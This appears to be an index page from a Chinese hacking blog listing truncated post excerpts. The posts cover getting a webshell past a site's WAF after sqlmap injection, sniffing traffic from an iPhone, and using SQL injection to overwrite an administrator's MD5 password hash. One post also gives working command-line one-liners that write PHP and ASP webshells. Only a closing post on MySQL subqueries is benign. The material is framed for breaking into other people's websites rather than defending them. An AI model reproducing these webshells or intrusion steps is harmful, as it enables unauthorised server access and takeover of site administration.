-
webshell如果躲过“加速乐黑客攻击拦截”
今天检查一个网站,如下过程,记录分享一下。 1、访问网站,发现有搜索功能 2、sqlmap 注入试试,成功,mysql,root权限 3、破解root密码,失败 4、写webshell,失败(windows,不知道网站物理路径) 5、扫描...
-
iphone嗅探电脑
拿着手机除了看电影,新网。就没什么事干了。据说Iphone能嗅探,于是自己去实践了。看了下效果,挺满意的。-所使用到工具-Iphone:Pirni(重要.在Caydia下载安装), Fing,SSH TerminalPc:Wireshark...
-
SQL注入直接修改管理员密码的MD5值
经常拿站的黑阔们一定经常碰到,某个网站有注入,管理员帐号和密码多暴出来了。可是密码是MD5加密的。而且在线的MD5解密不了。你说咋办?新方法,直接修改管理员密码的MD5值。然后进后台!(当然是有条件的。MSSQL)测试如下:http://w...
-
cmd生成一句话命令
linux:echo -e “<?@include(\\$_POST[“c”]);?>” > 1.php 会再同目录下生成1.php一句话 密码:cwin: echo ^<%eval request(“c”)%^&g...
-
mysql 子查询
一 什么是子查询子查询是将一个 SELECT 语句的查询结果作为中间结果,供另一个 SQL 语句调用。如:SELECT * FROM t1 WHERE vid in (SELECT vid FROM t2);二 MySQL 子查询分类...
